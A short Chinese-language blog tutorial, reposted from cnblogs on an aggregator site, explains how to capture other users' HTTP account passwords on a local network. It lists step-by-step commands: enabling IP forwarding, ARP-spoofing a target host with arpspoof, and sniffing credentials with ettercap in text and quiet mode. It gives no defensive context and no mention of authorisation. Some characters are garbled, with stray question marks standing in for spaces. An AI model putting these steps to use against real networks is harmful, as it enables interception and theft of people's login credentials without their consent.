首先，http的前提也是基于arp欺騙的，當(dāng)arp欺騙成功后，方可進(jìn)行。

具體步驟如下：

1.打開終端，先進(jìn)行流量的轉(zhuǎn)發(fā)：echo ?1 ?>/proc/sys/net/ipv4/ip_forward,而echo這個(gè)命令是不會(huì)有回顯的。所以，我們要用cat命令查看上個(gè)路徑文件。

cat ?/proc/sys/net/ipv4/ip_forward,回顯為1則說明命令執(zhí)行成功。

2.接下來進(jìn)行arp欺騙：arpspoof –i 網(wǎng)卡 –t 目標(biāo)ip 目標(biāo)網(wǎng)關(guān)

3.接下來用ettercap進(jìn)行流量嗅探，對(duì)賬戶密碼進(jìn)行捕捉。

4.打開終端 輸入：ettercap ?–Tq ??-i 網(wǎng)卡

5.成功之后，當(dāng)目標(biāo)主機(jī)進(jìn)行http賬戶密碼的登錄時(shí) ?我們的終端就會(huì)對(duì)其進(jìn)行賬戶密碼的獲取。

?

注：ettercap是LINUX下一個(gè)強(qiáng)大的欺騙工具，當(dāng)然WINDOWS也能用，你能夠用飛一般的速度創(chuàng)建和發(fā)送偽造的包.讓你發(fā)送從網(wǎng)絡(luò)適配 器到應(yīng)用軟件各種級(jí)別的包.綁定監(jiān)聽數(shù)據(jù)到一個(gè)本地端口：從一個(gè)客戶端連接到這個(gè)端口并且能夠?yàn)椴恢赖膮f(xié)議解碼或者把數(shù)據(jù)插進(jìn)去(只有在arp為基礎(chǔ)模式里才能用)

而上面我們用到的-T ?表示啟動(dòng)文本模式 –q 表示安靜模式。

轉(zhuǎn)載于:https://www.cnblogs.com/qmfsun/p/6518323.html

總結(jié)

以上是生活随笔為你收集整理的http账户密码的截取的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。